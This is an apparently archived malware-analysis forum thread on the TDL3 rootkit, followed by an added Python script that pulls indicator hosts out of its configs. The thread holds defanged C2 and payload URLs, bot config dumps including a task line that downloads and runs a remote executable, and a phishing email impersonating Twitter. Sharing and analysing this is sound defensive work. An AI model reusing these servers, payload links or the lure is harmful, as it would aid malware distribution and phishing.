A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #1225  by EP_X0FF
 Wed Jun 02, 2010 1:58 pm
Actually they did not even encrypt this message :)
Indestructible.
Determination that is incorruptible.
From the other side.
A terror to behold.
Kaspersky AV Suxx :) and so others are
http://www.virustotal.com/analisis/52df ... 1275486754

tdlcmd.dll indeed was updated to 3.82.

Btw this dropper contains a full copy of Mark's DebugView 4.76 resources.
 #1239  by cjbi
 Sat Jun 05, 2010 12:18 am
Interesting strings from a TDL3 sample.
So cold that you cannot cope
With a frozen heart
I guess we blow apart
I guessed it from the start
I do what I want to do and this is my job
These are song lyrics, except for the last line.
Finger Eleven - Stay In Shadow http://www.youtube.com/watch?v=rVczoqOTFEQ

VirusTotal result
http://www.virustotal.com/analisis/87e7 ... 1275676692
Attachments
pass: malware
(83.63 KiB) Downloaded 75 times
 #1242  by EP_X0FF
 Sat Jun 05, 2010 4:32 pm
One of the tdl3 bundle satellites

http://virusscan.jotti.org/en/scanresul ... 4650bc318e

Contains a list of malware URLs inside.
hxxp://bbonusworld.com/ufwnltbz/
hxxp://abtdiagnostic.com/ufwnltbz/

%stxrzxs.php?adv=adv470&code1=%s&code2=%s&id=%d&p=%s
%sllvuaues.exe
%srvqxfn.php?adv=adv470
%sbmirouy.exe
%sfjnvpk.php?adv=adv470
%snluwuuhm.exe
%swzdcjrp.php?adv=adv470
%scatrtbpd.exe
%sgnemtrzxsn.php?adv=adv470
%sicxngxus.exe
%simwaic.php?adv=adv470
%semql.exe
%syptozgozmu.php?adv=adv470
%sotmdiqda.exe
%sfwelcx.php?adv=adv470
%sflyfiudk.exe
%sfwevpovto.php?adv=adv470
%swdfppdai.exe
%skkemu.php?adv=adv470
%slfphs.exe
%soriqbjdp.php?adv=adv470
%srcapmvd.exe
%shypwhc.php?adv=adv470
%shyfahpxiq.php?adv=adv470
Attachments
pass: malware
(12.32 KiB) Downloaded 68 times
 #1247  by gjf
 Mon Jun 07, 2010 1:55 pm
Some new old way to infect somebody :)
Hi, BlahBlah@microsoft.com!
Attention! We detected that someone was trying to steal your Twitter account password.
We strongly recomended you to download our secure module to protect account!
Please click on the link below:
hxxp://twitter.com/Twitter_security_model_setup.zip
(real link under URL: hxxp://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip)
The Twitter Team
If you received this message in error and did not sign up for a Twitter account, click not my account (real link under URL - again hxxp://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip).
Please do not reply to this message; it was sent from an unmonitored email address. This message is a service email related to your use of Twitter. For general inquiries or to request support with your Twitter account, please visit us at Twitter Support (and again hxxp://twitter-security-model.googlegroups.com/web/Twitter_security_model_setup.zip).
So - no matter what you choose - you will be redirected :) And you will receive
(399.9 KiB) Downloaded 99 times
BTW - quite huge dropper in comparison with previous ones! :)
 #1255  by EP_X0FF
 Wed Jun 09, 2010 4:41 am
tdlcmd.dll updated to v3.83
added new configuration value

dropper
http://www.virustotal.com/analisis/9ce3 ... 1276058254

tdlcmd.dll
http://www.virustotal.com/analisis/139e ... 1276058250

removed upx
http://www.virustotal.com/analisis/7c4b ... 1276058320

driver loader
http://www.virustotal.com/analisis/392d ... 1276058320
[main]
quote=Tempers are wearing thin. Let's hope some robot doesn't kill everybody
version=3.273
botid=0
affid=0
subid=0
installdate=9.6.2010 4:33:16
builddate=8.6.2010 13:20:0
rnd=1229272821
knt=1276058307
[injector]
*=tdlcmd.dll
[tdlcmd]
version=3.83
bsh=xxx
delay=7200
servers=hxxps://873hgf7xx60.com/;hxxps://jro1ni1l1.com/;hxxps://61.61.20.132/;hxxps://1iii1i11i1ii.com/;hxxps://61.61.20.135/;hxxps://0o0o0o0o0.com/;hxxps://68b6b6b6.com/;hxxps://34jh7alm94.asia/
wspservers=hxxp://lk01ha71gg1.cc/;hxxp://zl091kha644.com/;hxxp://a74232357.cn/;hxxp://a76956922.cn/;hxxp://91jjak4555j.com/
popupservers=hxxp://cri71ki813ck.com/
clkservers=hxxp://lkckclckl1i1i.com/
Attachments
pass: malware
(133.38 KiB) Downloaded 88 times
 #1280  by EP_X0FF
 Tue Jun 15, 2010 2:58 pm
Hi,

I can confirm. I've tested latest build of Hitman Pro against TDL3 (sample posted in this thread above).
It detected and repaired infected driver with one reboot.

First post with TDL3 detection/removal software list is updated.

Regards.
 #1304  by EP_X0FF
 Mon Jun 21, 2010 3:40 am
hot recompiled sample

http://www.virustotal.com/ru/analisis/4 ... 1277091118 (3/41, ~7%)
[main]
quote=Dude, meet me in Montana XX00, Jesus (H. Christ)
version=3.273
botid=
affid=
subid=0
installdate=21.6.2010 3:34:51
builddate=21.6.2010 2:3:12
rnd=1390067357
knt=1277010763
[injector]
*=tdlcmd.dll
[tdlcmd]
version=3.83
delay=7200
servers=hxxps://873hgf7xx60.com/;hxxps://jro1ni1l1.com/;hxxps://61.61.20.132/;hxxps://1iii1i11i1ii.com/;hxxps://61.61.20.135/;hxxps://0o0o0o0o0.com/;hxxps://68b6b6b6.com/;hxxps://34jh7alm94.asia/
wspservers=hxxp://lk01ha71gg1.cc/;hxxp://zl091kha644.com/;hxxp://a74232357.cn/;hxxp://a76956922.cn/;hxxp://91jjak4555j.com/
popupservers=hxxp://cri71ki813ck.com/
clkservers=hxxp://lkckclckl1i1i.com/
[tasks]
206201051243=!hxxp://mffc.de/_022.exe
Downloads an additional payload (I have no time to analyze it)
http://www.virustotal.com/ru/analisis/3 ... 1277091502
Attachments
payload, pass: malware
(114.03 KiB) Downloaded 67 times
pass: malware
(71.72 KiB) Downloaded 68 times
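The two tdlcmd.dll config dumps above (v3.83 in posts #1255 and #1304) are plain INI-style text, so pulling the C2 / payload hosts out of them for a blocklist or a proxy-log hunt is a few lines of work. The following is an added example, not code from this thread or from any of the posters: it parses a config of that shape into sections, finds every hxxp/hxxps URL in the `servers`, `wspservers`, `popupservers`, `clkservers` and `[tasks]` values, and returns the unique hosts. The embedded `SAMPLE_CONFIG` is a constructed, abbreviated copy of the values posted above; the `!` prefix on the `[tasks]` value is left as-is, since the thread does not say what it means, and the URL regex simply skips it.

```python
import re
from urllib.parse import urlsplit

# Constructed sample, abbreviated from the tdlcmd v3.83 config dumps posted
# in this thread (values copied from the posts; list lengths shortened).
SAMPLE_CONFIG = """\
[main]
quote=Dude, meet me in Montana XX00, Jesus (H. Christ)
version=3.273
botid=
affid=
subid=0
installdate=21.6.2010 3:34:51
[injector]
*=tdlcmd.dll
[tdlcmd]
version=3.83
delay=7200
servers=hxxps://873hgf7xx60.com/;hxxps://jro1ni1l1.com/;hxxps://61.61.20.132/
wspservers=hxxp://lk01ha71gg1.cc/;hxxp://zl091kha644.com/
popupservers=hxxp://cri71ki813ck.com/
clkservers=hxxp://lkckclckl1i1i.com/
[tasks]
206201051243=!hxxp://mffc.de/_022.exe
"""

# Matches both defanged (hxxp) and live (http) schemes; stops at ';' or whitespace,
# which is the separator the config uses between server entries.
URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s;]+", re.IGNORECASE)

# Keys in [tdlcmd] that hold ';'-separated server lists in the posted dumps.
SERVER_KEYS = ("servers", "wspservers", "popupservers", "clkservers")


def parse_config(text):
    """Parse INI-style text into {section: {key: value}}.

    Values are kept verbatim (no unquoting), keys such as '*' are allowed,
    and a later duplicate key overwrites an earlier one.
    """
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue  # tolerate junk before the first header or lines without '='
        key, _, value = line.partition("=")
        sections[current][key.strip()] = value.strip()
    return sections


def refang(url):
    """Turn a defanged hxxp(s):// URL back into http(s):// so urlsplit can parse it."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)


def extract_urls(sections):
    """Return (source_key, url) pairs from the server lists and the [tasks] section."""
    found = []
    tdlcmd = sections.get("tdlcmd", {})
    for key in SERVER_KEYS:
        for entry in tdlcmd.get(key, "").split(";"):
            for url in URL_RE.findall(entry):
                found.append((key, url))
    # Task values carry a download URL, possibly with a leading marker ('!' above);
    # the regex picks the URL out regardless of what precedes it.
    for value in sections.get("tasks", {}).values():
        for url in URL_RE.findall(value):
            found.append(("tasks", url))
    return found


def indicator_hosts(sections):
    """Sorted unique hostnames / IPs: the list you would feed a blocklist or log search."""
    hosts = set()
    for _, url in extract_urls(sections):
        host = urlsplit(refang(url)).hostname
        if host:
            hosts.add(host)
    return sorted(hosts)


if __name__ == "__main__":
    cfg = parse_config(SAMPLE_CONFIG)
    print("tdlcmd version:", cfg["tdlcmd"].get("version"))
    for src, url in extract_urls(cfg):
        print(f"{src:13s} {url}")
    print("hosts:", ", ".join(indicator_hosts(cfg)))
```

Paste a full dump in place of `SAMPLE_CONFIG` (or read it from a file) and diff the host list between builds; the `[main]` fields such as `version`, `builddate` and the `[tdlcmd]` `version` line are the quickest way to tell which build a dump came from.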